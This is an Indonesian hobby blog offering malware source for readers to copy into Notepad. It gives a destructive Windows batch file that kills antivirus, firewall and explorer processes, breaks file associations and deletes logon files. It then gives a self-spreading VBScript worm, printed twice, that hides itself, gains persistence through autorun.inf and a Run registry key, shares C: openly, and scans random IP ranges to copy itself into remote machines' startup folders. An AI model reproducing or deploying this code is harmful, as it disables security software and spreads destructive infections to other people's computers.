Lagi dan lagi saia membahas virus dengan notepad. .. hahahaha
langsung ajah!!
Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens
Hanya Copy kode di bawah ini lalu paste Pada Notepad:
title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown
Simpan di C: dengan nama installhack.bat
Selesai
abel_napster
Featured Posts
Senin, 24 Januari 2011
Senin, 13 Desember 2010
Cara buat worm
Kali ini kita bakalan belajar membuat worm, Disini saya terangkan sedikit apa itu Worm, Worm ditujukan kepada program yang mengkopi dirinya sendiri ke HANYA memory komputer. Perbedaan mendasar dari worm dan virus adalah, apakah menginfeksi target code atau tidak. Virus menginfeksi target code, tetapi worm tidak. Worm hanya tinggal di memory. Worm dapat dengan cepat memperbanyak diri dan biasanya dilakukan pada media LAN atau Internet, resources jaringan yang terinfeksi akan habis bandwidthnya dibanjiri oleh worm yang akan mengakibatkan melambatnya aliran data. Contoh worm: I-Worm/Happy99(Ska), I-Worm/ExploreZIP, Sobig, Nimda, Code Red, Sircam. Worm umumnya berbentuk file executable (berekstensi .EXE atau .SCR), yang terlampir (attach) pada email. Namun demikian, ada beberapa jenis worm yang berbentuk script yang ditulis dalam bahasa Visual Basic (VBScript).
Udh gk sabar kan??
'54807463
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:\", "s:\")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe \"
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM\" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
On Error Resume Next
Dim Wshshell,Markas,fso,a,RG,raxa,raxb,raxc,raxd,rand,dot,drivecon,sharename,count
count = "0"
dot = "."
drivecon="0"
set wshnetwork = wscript.createobject("wscript.network")
Set Wshshell = Wscript.CreateObject("Wscript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
RG = "Software\Microsoft\Windows\CurrentVersion"
Set Markas = fso.GetSpecialFolder(0)
SU = Wshshell.SpecialFolders("AllUsersStartUp")
SU = Replace(SU, "C:\", "s:\")
If fso.FileExists("autorun.inf") then
Wshshell.Run "explorer.exe \"
End if
Wshshell.Run("net share system=C:\ /unlimited"), 0, true
Randomize
For i =1 to 8
r = int(rnd * 50) + 66
polm = polm & Chr(r)
next
polm = Chr(39) & polm & Chr(13) & Chr(10)
Set dropper = fso.OpenTextFile(Wscript.ScriptFullName, 1)
strRan = dropper.readline
src = dropper.readall
strRan = polm
randmat()
Do
If not fso.FileExists(Markas & "\sabotage.vbs") then
Set dropper = fso.CreateTextFile(Markas & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(Markas & "\sabotage.vbs").attributes = 39
Wshshell.Run "wscript.exe " & Markas & "\sabotage.vbs"
End if
Wshshell.RegWrite "HKLM\" & RG & "\Run\WinSystem", Markas & "\sabotage.vbs"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HideFileExt", "1", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\HIDDEN", "0", "REG_DWORD"
Wshshell.RegWrite "HKCU\" & RG & "\EXPLORER\ADVANCED\SHOWSUPERHIDDEN", "0", "REG_DWORD"
for each a in fso.drives
If a.isready then
fso.GetFile(a & "\sabotage.vbs").Attributes = 0
Set dropper = fso.CreateTextFile(a & "\sabotage.vbs", True)
dropper.write strRan
dropper.write src
dropper.Close
fso.GetFile(a & "\sabotage.vbs").Attributes = 39
fso.GetFile(a & "\autorun.inf").Attributes = 0
Set auto = fso.CreateTextFile(a & "\autorun.inf", True)
auto.WriteLine("[autorun]")
auto.WriteLine("ShellExecute=wscript.exe sabotage.vbs")
auto.Close
fso.GetFile(a & "\autorun.inf").Attributes = 39
End if
next
If not Wscript.ScriptFullName = Markas & "\sabotage.vbs" then
Wscript.Quit
End if
do while drivecon = "0"
check()
shareformat()
wshnetwork.mapnetworkdrive "s:", sharename
enumdrives()
loop
copyfiles()
disconnect()
Wscript.Sleep 60000
Loop
function disconnect()
wshnetwork.removenetworkdrive "s:"
drivecon = "0"
end function
function copyfiles()
Set fso = CreateObject("scripting.filesystemobject")
fso.copyfile Wscript.ScriptFullName, SU & "\sab0tage.vbs"
end function
function check()
raxd = raxd + 1
if raxd = "255" then randmat()
end function
function shareformat()
sharename = "\\" & raxa & dot & raxb & dot & raxc & dot & raxd & "\C"
end function
function enumdrives()
Set odrives = wshnetwork.enumnetworkdrives
For i = 0 to odrives.Count -1
if sharename = odrives.item(i) then
drivecon = 1
else
' drivecon = 0
end if
Next
end function
function randum()
rand = int((254 * rnd) + 1)
end function
function randmat()
if count < 50 then
raxa=Int((16) * Rnd + 199)
count=count + 1
else
randum()
raxa= rand
end if
randum()
raxb=rand
randum()
raxc=rand
raxd="1"
end function
setelah itu loE copy paste di notepad kemudian dengan nama terserah anda misalkan ( belajar.vbs ) inget dblakang nama worm itu hrs vbs!! liat gambar dibawah ini!!
Rabu, 01 Desember 2010
DevilCode
Brada n Sist klo kalian mau Belajar buat sourcode jahat ato yg biasa disebut dengan virus, hanya disini tempatnya!! tp bru sebagian aja yg anE postkan n sudah di uji coba di lab A n B kampuz stiki indonesia. .. tp virus ini cuma buat kejailan aja, anE kagak berani buat post yg berbahaya. ..
wkwkwkwk, bruakakaakakkk, kelkelkel, hahaahahasilahkan digunakan dengan bijak ya!!
Langganan:
Postingan (Atom)